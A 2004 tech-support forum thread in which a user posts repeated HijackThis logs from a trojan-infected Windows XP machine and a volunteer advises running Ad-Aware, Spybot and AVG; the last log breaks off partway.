Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

hijackthis log

Started by tlorott , Aug 05 2004 07:01 AM

  • Please log in to reply

#1
tlorott
Posted 05 August 2004 - 07:01 AM

tlorott

    Member

  • Member
  • PipPip
  • 10 posts
I tried them all: Spybot S&D, Lavasoft Ad-Aware, Spysweeper. My computer only stays clean however until the moment I connect to the Internet. I ran the HijackThis. Could you please help me analyzing the log below.
Thanks very much for your help

Logfile of HijackThis v1.97.7
Scan saved at 9:39:28 PM, on 8/4/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchosting.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\msnmsgr.exe
C:\WINDOWS\System32\WinFixd32.exe
C:\WINDOWS\System32\lijltbn.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\WINDOWS\System32\wssdsfgsd.exe
C:\Program Files\Common Files\Real\Update_OB\rnathchk.exe
C:\Program Files\Web_Rebates\WebRebates0.exe
C:\WINDOWS\System32\msework.exe
C:\WINDOWS\System32\msnetcfgs.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\Program Files\Web_Rebates\WebRebates1.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = about:blank
R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
R3 - URLSearchHook: (no name) - {707E6F76-9FFB-4920-A976-EA101271BC25} - C:\Program Files\TV Media\TvmBho.dll
O2 - BHO: (no name) - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem219.dll (file missing)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: Yahoo! Companion BHO - {13F537F0-AF09-11d6-9029-0002B31F9E59} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O2 - BHO: (no name) - {5886A6DC-AAF4-45E9-979A-8E5E6DEE30E7} - C:\Program Files\zSearch\zSearch.dll (file missing)
O2 - BHO: (no name) - {6F8D170C-B030-7EB3-D554-625509A6261D} - C:\WINDOWS\System32\opivqr.dll
O2 - BHO: (no name) - {A3FDD654-A057-4971-9844-4ED8E67DBBB8} - C:\Program Files\SideFind\sfbho.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O3 - Toolbar: (no name) - {BDF6CE3D-F5C5-4462-9814-3C8EAC330CA8} - (no file)
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\realsched.exe -osboot
O4 - HKLM\..\Run: [MoneyStartUp10.0] "c:\Program Files\Microsoft Money\System\Activation.exe"
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /keeploaded
O4 - HKLM\..\Run: [Microsoft Update Machine] winsvc32.exe
O4 - HKLM\..\Run: [msn] msnmsgr.exe
O4 - HKLM\..\Run: [Microsoft Updater Resources] WinFixd32.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\Run: [Cryptographic Service] C:\WINDOWS\System32\rnmcy.exe
O4 - HKLM\..\Run: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\Run: [Micro Update] dailin.exe
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\Run: [zSearch] C:\Program Files\zSearch\Zstb.exe
O4 - HKLM\..\Run: [jycfnq] C:\WINDOWS\System32\lijltbn.exe
O4 - HKLM\..\Run: [2D281386] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\Run: [System Update] C:\WINDOWS\System32\kgpsg.exe
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\Run: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\Run: [Spyware remover] C:\WINDOWS\Remove_spyware.exe
O4 - HKLM\..\Run: [WebRebates0] "C:\Program Files\Web_Rebates\WebRebates0.exe"
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [fod] C:\WINDOWS\fod.exe
O4 - HKLM\..\Run: [Win32 USB2 Driver] svchosting.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] winsvc32.exe
O4 - HKLM\..\RunServices: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\RunServices: [msn] msnmsgr.exe
O4 - HKLM\..\RunServices: [Microsoft Updater Resources] WinFixd32.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunServices: [Micro Update] dailin.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\RunServices: [23A7353C] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Win32 USB2 Driver] svchosting.exe
O4 - HKCU\..\Run: [msn] msnmsgr.exe
O4 - HKCU\..\Run: [Win32 USB2 Driver] svchosting.exe
O4 - HKCU\..\Run: [Microsoft Updater Resources] WinFixd32.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKCU\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunOnce: [Win32 USB2 Driver] svchosting.exe
O4 - HKLM\..\RunOnce: [TV Media] C:\Program Files\TV Media\Tvm.exe
O4 - HKCU\..\RunOnce: [TV Media] C:\Program Files\TV Media\Tvm.exe
O4 - HKCU\..\RunOnce: [Win32 USB2 Driver] svchosting.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O8 - Extra context menu item: Web Rebates - file://C:\Program Files\Web_Rebates\Sy1150\Tp1150\scri1150a.htm
O9 - Extra button: SideFind (HKLM)
O9 - Extra button: Yahoo! Login (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Login (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} - http://www.mt-downlo...tsInstaller.cab
O16 - DPF: {A17E30C4-A9BA-11D4-8673-60DB54C10000} (YahooYMailTo Class) - http://download.yaho...mail/ymmapi.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab
O16 - DPF: {E0CE16CB-741C-4B24-8D04-A817856E07F4} - http://cabs.media-mo...abs/downzip.cab


This is the end.
Thanks again
Tom
  • 0

Advertisements

#2
tlorott
Posted 05 August 2004 - 12:54 PM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
While waiting, I ran the housecall.antivirus.com which found and deleted 21 trojans. Here is the new HijackThis log it is somewhat different.

Logfile of HijackThis v1.97.7
Scan saved at 2:08:02 PM, on 8/5/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\lijltbn.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\WINDOWS\System32\msework.exe
C:\WINDOWS\System32\msnetcfgs.exe
C:\Program Files\Web_Rebates\WebRebates1.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\System32\pwbphmha.exe
C:\Program Files\Web_Rebates\WebRebates0.exe
C:\WINDOWS\System32\msnmsgr.exe
C:\WINDOWS\System32\expl0rer.exe
C:\WINDOWS\System32\wssdsfgsd.exe
C:\Program Files\Common Files\Real\Update_OB\rnathchk.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = about:blank
R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
R3 - URLSearchHook: (no name) - {707E6F76-9FFB-4920-A976-EA101271BC25} - C:\Program Files\TV Media\TvmBho.dll
O2 - BHO: (no name) - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem219.dll (file missing)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: Yahoo! Companion BHO - {13F537F0-AF09-11d6-9029-0002B31F9E59} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O2 - BHO: (no name) - {5886A6DC-AAF4-45E9-979A-8E5E6DEE30E7} - C:\Program Files\zSearch\zSearch.dll (file missing)
O2 - BHO: (no name) - {6F8D170C-B030-7EB3-D554-625509A6261D} - C:\WINDOWS\System32\opivqr.dll
O2 - BHO: (no name) - {A3FDD654-A057-4971-9844-4ED8E67DBBB8} - C:\Program Files\SideFind\sfbho.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O3 - Toolbar: (no name) - {BDF6CE3D-F5C5-4462-9814-3C8EAC330CA8} - (no file)
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\realsched.exe -osboot
O4 - HKLM\..\Run: [MoneyStartUp10.0] "c:\Program Files\Microsoft Money\System\Activation.exe"
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /keeploaded
O4 - HKLM\..\Run: [msn] msnmsgr.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\Run: [Cryptographic Service] C:\WINDOWS\System32\rnmcy.exe
O4 - HKLM\..\Run: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\Run: [Micro Update] dailin.exe
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\Run: [zSearch] C:\Program Files\zSearch\Zstb.exe
O4 - HKLM\..\Run: [jycfnq] C:\WINDOWS\System32\lijltbn.exe
O4 - HKLM\..\Run: [2D281386] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\Run: [System Update] C:\WINDOWS\System32\kgpsg.exe
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\Run: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\Run: [WebRebates0] "C:\Program Files\Web_Rebates\WebRebates0.exe"
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\RunServices: [msn] msnmsgr.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunServices: [Micro Update] dailin.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\RunServices: [23A7353C] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\Run: [msn] msnmsgr.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKCU\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunOnce: [TV Media] C:\Program Files\TV Media\Tvm.exe
O4 - HKCU\..\RunOnce: [TV Media] C:\Program Files\TV Media\Tvm.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O8 - Extra context menu item: Web Rebates - file://C:\Program Files\Web_Rebates\Sy1150\Tp1150\scri1150a.htm
O9 - Extra button: SideFind (HKLM)
O9 - Extra button: Yahoo! Login (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Login (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} - http://www.mt-downlo...tsInstaller.cab
O16 - DPF: {A17E30C4-A9BA-11D4-8673-60DB54C10000} (YahooYMailTo Class) - http://download.yaho...mail/ymmapi.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab
O16 - DPF: {E0CE16CB-741C-4B24-8D04-A817856E07F4} - http://cabs.media-mo...abs/downzip.cab
  • 0

#3
Smokey
Posted 05 August 2004 - 02:03 PM

Smokey

    Member 1K

  • Retired Staff
  • 1,423 posts
You have a hijacker onboard. Download the latest version of Ad-Aware from here (if you already have Ad-Aware installed, make sure that it is the latest version and always go online and update it before you run it).

After installing AAW, and before running the program, you must FIRST update the reference file.

Now do the following:

Under Ad-aware 6 > Settings (Gear at the top) > Tweaks > Scanning Engine:
check: "Unload recognized processes during scanning."

Under Ad-aware 6 > Settings (Gear at the top) > Tweaks > Cleaning Engine:
Check: "Let Windows remove files in use after reboot."

Press "Scan Now"

- Check option "Use Custom scanning options"
- Check option "Activate In-Depth Scan"
- Press "Select drives\folders to scan"
- Select the active partition which is usually C:

Now press "Next" to let Ad-aware scan your drives. It will find a number of spyware files and registry keys. Right-click in that pane and choose "select all"

Now press "Next" again. It will ask you whether you'd like to remove all checked items. Click OK.

Finally, close Ad-Aware.

Also update and run a scan with Spybot. After that please run a free trojan scan:
http://www.moosoft.com/

Reboot, run Hijack This again, and post back a fresh log.
  • 0

#4
tlorott
Posted 05 August 2004 - 05:03 PM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
AdAdware deleted some 151 objects. After that, Spybot still found one occurrence of CleverIEHooker.Jeired. Mooseoft cleaner did not find anything. Here is the new HijackThis.log

Logfile of HijackThis v1.97.7
Scan saved at 6:56:28 PM, on 8/5/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\msnmsgr.exe
C:\WINDOWS\System32\lijltbn.exe
C:\WINDOWS\System32\wssdsfgsd.exe
C:\Program Files\Web_Rebates\WebRebates0.exe
C:\Program Files\Common Files\Real\Update_OB\rnathchk.exe
C:\WINDOWS\System32\expl0rer.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\Program Files\Web_Rebates\WebRebates1.exe
C:\WINDOWS\System32\pwbphmha.exe
C:\Program Files\The Cleaner\tca.exe
C:\Program Files\The Cleaner\tcm.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
R3 - URLSearchHook: (no name) - {707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: Yahoo! Companion BHO - {13F537F0-AF09-11d6-9029-0002B31F9E59} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O2 - BHO: (no name) - {6F8D170C-B030-7EB3-D554-625509A6261D} - C:\WINDOWS\System32\opivqr.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O3 - Toolbar: (no name) - {BDF6CE3D-F5C5-4462-9814-3C8EAC330CA8} - (no file)
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\realsched.exe -osboot
O4 - HKLM\..\Run: [MoneyStartUp10.0] "c:\Program Files\Microsoft Money\System\Activation.exe"
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /keeploaded
O4 - HKLM\..\Run: [msn] msnmsgr.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\Run: [Cryptographic Service] C:\WINDOWS\System32\rnmcy.exe
O4 - HKLM\..\Run: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\Run: [Micro Update] dailin.exe
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\Run: [jycfnq] C:\WINDOWS\System32\lijltbn.exe
O4 - HKLM\..\Run: [2D281386] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\Run: [System Update] C:\WINDOWS\System32\kgpsg.exe
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\Run: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\Run: [WebRebates0] "C:\Program Files\Web_Rebates\WebRebates0.exe"
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\RunServices: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\RunServices: [msn] msnmsgr.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunServices: [Micro Update] dailin.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\RunServices: [23A7353C] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\Run: [msn] msnmsgr.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKCU\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O8 - Extra context menu item: Web Rebates - file://C:\Program Files\Web_Rebates\Sy1150\Tp1150\scri1150a.htm
O9 - Extra button: Yahoo! Login (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Login (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {A17E30C4-A9BA-11D4-8673-60DB54C10000} (YahooYMailTo Class) - http://download.yaho...mail/ymmapi.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab
O16 - DPF: {E0CE16CB-741C-4B24-8D04-A817856E07F4} - http://cabs.media-mo...abs/downzip.cab
  • 0

#5
Smokey
Posted 05 August 2004 - 05:32 PM

Smokey

    Member 1K

  • Retired Staff
  • 1,423 posts
Still a lot there. Please download AVG Free Edition:

http://free.grisoft....eweb.php/doc/2/

Update, then run a complete test. Remove all found pests, then restart and post a new log. <_<
  • 0

#6
tlorott
Posted 06 August 2004 - 11:34 AM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
I dowloaded and ran AVG6. The new HijackThis. log is below. Does "The Cleaner" have anything to do to AVG? It was installed when I was downloading AVG.

Logfile of HijackThis v1.97.7
Scan saved at 12:56:54 PM, on 8/6/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\WINDOWS\System32\wssdsfgsd.exe
C:\Program Files\Web_Rebates\WebRebates0.exe
C:\WINDOWS\System32\msework.exe
C:\WINDOWS\System32\msnetcfgs.exe
c:\WINnt\system32\dllcache\userlist.exe
C:\WINDOWS\SYSTEM\winlogon.exe
c:\WINnt\system32\dllcache\runbatch.exe
